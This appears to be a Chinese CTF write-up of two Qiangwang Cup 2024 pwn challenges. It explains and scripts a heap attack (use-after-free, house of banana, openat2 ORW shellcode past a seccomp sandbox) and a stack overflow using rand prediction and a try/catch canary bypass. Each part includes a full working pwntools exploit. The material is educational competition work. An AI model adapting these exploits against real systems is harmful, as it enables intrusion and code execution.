强网杯 2024 pwn false AK

强网杯 2024 pwn

🏄🏽‍♀️前言
🏄🏽‍♂️heap（UAF + house of banana + orw）
- 🏄🏽分析
- 🏄🏽解题
- 🏄🏽exp
🏄🏽‍♂️expect_number（random + 栈溢出 + try/catch抛出异常canary绕过）
- 🏄🏽分析
- 🏄🏽解题
- 🏄🏽exp

🏄🏽‍♀️前言

只做了两题，有些遗憾没能把chat_with_me也做出来。heap的爆破耽误了好多时间，第一次爆破2.35不太熟练

🏄🏽‍♂️heap（UAF + house of banana + orw）

🏄🏽分析

在这里插入图片描述
checksec查看。保护全开

IDA查看。这里我已经改好名了

开始这里设置了一下libc这个段，将一些IO的地址改为0了，不知道有什么用，好像是禁IO，apple可能用不了，所以我没往这方面考虑

沙箱查看。禁open，execve，openat。禁了和没禁一样，原意可能是用ptrace绕过，有可能出题人不知道openat2。所以直接正常orw就行了
在这里插入图片描述
add函数中只能add大块chunk，明显largebin attack，考虑house of banana，house of banana原理不讲，主要是改_rtld_global为可控堆地址

delete函数存在UAF漏洞

edit函数只能edit一次，要想成功house of banana要两次

show函数直接show一个大块，只能泄露一次，可能有漏洞能利用，这里不管
在这里插入图片描述
env函数感觉没啥用，不管。后来看是可以打印环境变量里的flag，后来又听出题人说失误没清环境变量里的flag

secret函数有一次任意地址改的机会，house of banana可以执行了，利用这个机会改_rtld_global

有个更改地址的检查，在某个范围内不能改，我没仔细看，对house of banana无关

🏄🏽解题

在这里插入图片描述

照house of banana的操作来，先申请较大块，申请最大块，申请较小块，删除较大块，申请最大块，较大块就能进largebin

进去之后连接到了heap的地址和libc的地址，都能泄露出来，以及附带的一些gadget

泄露出来后，计算_rtld_global的地址，由于高版本环境libcbase的末5为固定为0，所以比较好爆破，需要1/512的概率。首先是 + 0x21c000，随后 + （0x1000~0x200000）的数（这里末3位不随机，1/512的概率），再 + 0x6b040的固定偏移（环境不同会变化）
在这里插入图片描述

随后利用secret修改_rtld_global，sleep是为了等本地进程结束，再在delete中输入就会直接异常结束进程，方便爆破。远程也同理，delete的主要作用是爆破，可以不用

之后把link_map结构体写进可控堆，需要注意的是上面给的结构体图是2.31的，2.35需要将*l_next字段改为_rtld_global + 0x1850而不是0x16e0，house of banana基本完成
在这里插入图片描述
输入6来触发exit函数走_dl_fini执行流，mprotect一段地址，再写shellcode上去，调用openat2，read，write完成orw

写一个爆破的函数，概率比较小可以多开几个终端一起爆

🏄🏽exp

from pwn import *filename = './pwn'elf = ELF(filename)context(arch = elf.arch, log_level = 'debug', os = 'linux')def dbg():gdb.attach(io)libc = ELF('./libc-2.35.so')def add(size):io.sendlineafter('choice: \n', '1')io.sendlineafter('size \n', str(size))def delete(index):io.sendlineafter('choice: \n', '2')io.sendlineafter('delete: \n', str(index))def edit(index, content):io.sendlineafter('choice: \n', '3')io.sendlineafter('edit: \n', str(index))io.sendlineafter('content \n', content)def show(index):io.sendlineafter('choice: \n', '4')io.sendlineafter('show: \n', str(index))def pwn():add(0x510)add(0x600)add(0x500)delete(1)add(0x600)show(1)io.recvuntil('here \n')large_430 = u64(io.recv(8))io.recv(8)heapbase = u64(io.recv(8)) - 0x1950libcbase = large_430 - 0x21b110libc.address = libcbasesetcontext = libc.sym['setcontext'] + 0x3dsyscall = libc.sym['read'] + 16ret = libcbase + 0x29139rdi = libcbase + 0x2a3e5rsi = libcbase + 0x2be51rdx_rbx = libcbase + 0x904a9rcx = libcbase + 0x3d1eerax = libcbase + 0x45eb0success('libcbase =>> ' + hex(libcbase))success('heapbase =>> ' + hex(heapbase))success('setcontext =>> ' + hex(setcontext))_rtld_global = libcbase + 0x21c000 + 0x1f5000 + 0x6b040success('_rtld_global =>> ' + hex(_rtld_global))heap = heapbase + 0x2480io.sendlineafter('choice: \n', '6')io.sendafter('addr \n', p64(_rtld_global))io.send(p64(heap))sleep(0.1)delete(3)link_map = p64(0)link_map += p64(_rtld_global + 0x1850) #2.35link_map += p64(0)link_map += p64(heap)link_map += p64(0) * 28 link_map += p64(heap + 0x110)link_map += p64(heap + 0x110)link_map += p64(heap + 0x120)link_map += p64(0x40)link_map += b'/bin/sh\x00'link_map += p64(heap + 0x110)link_map += p64(setcontext)link_map += p64(ret)link_map += p64(0) * 12link_map += p64(0)link_map += p64(heap + 0x110)link_map += p64(0) * 2link_map += p64(0x200)link_map += p64(0) * 2link_map += p64(heap + 0x110)link_map += p64(libc.sym['read'])link_map += p64(0) * 36link_map += p64(0xb00000000)io.sendline('3')io.sendlineafter('edit: \n', str(3))io.sendafter('content \n', link_map)io.recv()io.sendline('6')io.send(p64(rdi) + p64(heap - (heap & 0xfff)) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(10) + p64(syscall) + p64(rdi) + p64(0) + p64(rsi) + p64(heap - (heap & 0xfff)) + p64(rdx_rbx) + p64(0x500) + p64(0) + p64(rax) + p64(0) + p64(syscall) + p64(heap - (heap & 0xfff)))shellcode = f'''mov rax, 0x67616c66 /*  /flag   */push raxxor rdi, rdisub rdi, 100mov rsi, rsppush 0push 0push 0mov rdx, rspmov r10, 0x18push 437pop raxsyscall'''io.send(asm(shellcode + shellcraft.read(3, heap, 0x100) + shellcraft.write(1, heap, 0x100)))io.interactive()for i in range(1000):io = process(filename)try:pwn()except:continuefinally:io.close()

🏄🏽‍♂️expect_number（random + 栈溢出 + try/catch抛出异常canary绕过）

🏄🏽分析

在这里插入图片描述
checksec查看。保护全开

IDA查看。这里我已经改好名了

intt函数中，初始化了一下，设置了srand为1，后面有用到rand，关于随机数可以看我的这篇文章学习
https://blog.csdn.net/j284886202/article/details/134676894

告诉说要闯288关，只能用0, 1, 2三个数，我还以为是shellcode，说如果能让数等于0x4F5DA2就能给个gift，实际是等于0xA2，也没给gift

在这里插入图片描述
vuln函数中，利用index函数输入想要的index，如果是4的话会执行那样一个东西，是1则是进行运算，2是show一下之前所有运算中用到了什么数，3是给gift

count函数，上来检测一下如果超过了288次运算则退出，最多只能运算288次，随后rand了一下，1-4这四个值作为要执行的加减乘除操作，如果是4，先判断被除数不能为0，再判断要能整除，随后再进行除法。

加减乘的话没有太多要求，直接赋值就好
在这里插入图片描述
随后执行这一段，检查了一下结果数字的大小，不能超过0x101。需要注意的是该函数在拿v11的时候有一个操作是movsx eax, al，这个操作使得原数字的大小不能超过128，否则会被扩展成32位负数，最后在检查结果数字大小的时候必定超过0x101。

检查完后将本次的操作数放到那个内存地址里，再将本次结果数字放到本次的操作数的地址后面

在这里插入图片描述
show的话没什么好说的。gift函数就是检测结果数字是不是0xA2，如果是就执行system(“cat gift”)，但远程并没有gift，这个只能用来说是熟悉一下题目操作

IDA先分析到这，剩下的必须结合解题来分析了

🏄🏽解题

在这里插入图片描述
随便进行一些操作，data数据如图，末尾0x60是结果数字，前面的303132这些是操作数，加了0x30。下面0x5c3df880c520处有个地址，是在menu执行‘4’，exit的时候用的

观察‘4’的调用流程，可以知道，先从0x5e3c930ca520拿了一个地址，再从这个地址里拿一个地址，作为call rdx执行，rdi参数不重要
在这里插入图片描述
进入IDA，发现拿的第一个地址在这里，这里是一个偏移表，有很多偏移

随后第二个地址会拿到exitt
在这里插入图片描述
之后执行了这里的内容

如果能更改从0x5e3c930ca520拿的地址，例如拿到off_4C60，就可以去执行rread函数

在这里插入图片描述
这里有个栈溢出，刚好覆盖ret，随后是try/catch抛出异常绕过canary（原理不讲）

找了一下’/bin/sh’字符串，发现这里有个try/catch，后面接了个system，等会就ret到这里就可以获取shell了

经过288次操作后，操作数刚好写满了，但是结果数字会写在操作数的后一位，导致了溢出，将原本的exit跳板修改为了rread的跳板

这里还需要控制结果数字为0x60
在这里插入图片描述
调用C库模拟rand，我这里是奔着srand的种子是time去写的，他这里降低了难度，固定种子为1，但是用time做种子也可以做

skip函数用来跳过无关数字，count完成需要的操作，期望：2 3 6 12 24 48 96

0 + 2 = 2， 2 + 1 = 3，后面一直 * 2就好
在这里插入图片描述
用skip填充后面的字符，直到288次，溢出一字节

由于0x5e3c930ca520存了一个程序段的地址，所以还能获取程序基地址，计算出bss地址以及刚刚的system的try的地址 + 1

随后触发‘4’，exit已经被替换为rread函数了，rbp填bss，ret填system的try的地址 + 1，就可以绕过canary并获取shell

🏄🏽exp

from pwn import *
from ctypes import *filename = './expect_number'debug = 0
if debug:io = remote('47.94.237.181', 32818)
else:io = process(filename)elf = ELF(filename)context(arch = elf.arch, log_level = 'debug', os = 'linux')def dbg():gdb.attach(io)libc = cdll.LoadLibrary('libc.so.6')libc.srand(1)def add(num):io.sendlineafter('choice ', '1')io.sendlineafter('choose? 2 or 1 or 0', str(num))def show():io.sendlineafter('choice ', '2')def submit():io.sendlineafter('choice ', '3')def exit():io.sendlineafter('choice ', '4')def skip(how, b = ''):for i in range(how):if b == '':b = libc.random() % 4 + 1if b == 1:add(0)elif b == 2:add(0)elif b == 3:add(1)elif b == 4:add(1)b = ''i = 0def count(how, value):global iwhile 1:a = libc.random() % 4 + 1i += 1if a == how:add(value)break;else:skip(1, a)continue# 2 3 6 12 24 48 96count(1, 2)
count(1, 1)
count(3, 2)
count(3, 2)
count(3, 2)
count(3, 2)
count(3, 2)skip(0x114 - i)show()
io.recvuntil('History')
io.recv(0x11a)
base = u64(io.recv(6).ljust(8, b'\0')) - 0x4c60
success('base =>> ' + hex(base))
bss = base + 0x5500
sys = base + 0x2515 + 1exit()
io.send(b'A' * 0x20 + p64(bss) + p64(sys))io.interactive()